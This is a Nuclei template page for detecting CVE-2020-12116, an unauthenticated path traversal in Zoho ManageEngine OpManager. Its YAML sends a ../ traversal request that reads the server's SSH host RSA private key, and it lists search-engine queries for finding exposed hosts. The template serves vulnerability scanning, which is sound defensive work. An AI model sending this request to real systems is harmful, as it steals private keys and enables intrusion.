Skip to content
Nuclei Templates

Zoho ManageEngine OpManger - Arbitrary File Read

ID: CVE-2020-12116

Severity: high

Author: dwisiswant0

Tags: cve,cve2020,zoho,lfi,manageengine,zohocorp

Description

Section titled “Description”

Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.

YAML Source

Section titled “YAML Source”
id: CVE-2020-12116


info:
  name: Zoho ManageEngine OpManger - Arbitrary File Read
  author: dwisiswant0
  severity: high
  description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine OpManger to mitigate the vulnerability.
  reference:
    - https://github.com/BeetleChunks/CVE-2020-12116
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12116
    - https://www.manageengine.com/network-monitoring/help/read-me-complete.html
    - https://www.manageengine.com/network-monitoring/help/read-me-complete.html#125125
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-12116
    cwe-id: CWE-22
    epss-score: 0.97317
    epss-percentile: 0.99876
    cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zohocorp
    product: manageengine_opmanager
    shodan-query: http.title:"opmanager plus"
    fofa-query: title="opmanager plus"
    google-query: intitle:"opmanager plus"
  tags: cve,cve2020,zoho,lfi,manageengine,zohocorp


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Connection: close
      - |
        GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Cache-Control: max-age=0
        Connection: close
        Referer: http://{{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "BEGIN RSA PRIVATE KEY")'
          - 'status_code_2 == 200'
        condition: and


    extractors:
      - type: regex
        name: endpoint
        regex:
          - "(?m)/cachestart/.*/jquery/"
        internal: true
        part: body
# digest: 4a0a00473045022047300c0fa04d32ff9c6fdb8523b58fd1906c19bc6be02327b732e6ccad2dca500221009a5d527cddd0ea95e7df2453178751047d01ac27c56001cf420f467dd318c728:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-12116.yaml"

View on Github